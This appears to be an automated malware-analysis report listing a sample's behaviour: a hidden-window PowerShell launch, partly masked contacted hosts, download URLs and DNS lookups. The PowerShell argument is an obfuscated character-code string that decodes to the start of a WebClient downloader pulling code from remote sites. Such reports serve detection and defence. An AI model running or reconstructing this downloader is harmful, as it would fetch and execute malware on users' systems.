Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " ( '36q106f105w99z61q110%101!119m45z111m98f106V101f99%116w32c78q101G116V46%87f101%98w67V108%105c101%110%116G59m36z70q117V71V61!39!104m116f116%112G58m47G47f119w119f119q46c97q108c116q105%110q111...
- '3p##ook.com':80
- 'sc###teel.ru':80
- http://www.3p##ook.com/R2/
- http://3p##ook.com/R2/
- http://sc###teel.ru/wxGo/
- DNS ASK al####luk-akcay.com
- DNS ASK 5s####axi.com.br
- DNS ASK 3p##ook.com
- DNS ASK ai###tes.co.uk
- DNS ASK sc###teel.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " ( '36q106f105w99z61q110%101!119m45z111m98f106V101f99%116w32c78q101G116V46%87f101%98w67V108%105c101%110%116G59m36z70q117V71V61!39!104m116f116%112G58m47G47f119w119f119q46c97q108c116q105%110q111...' (with hidden window)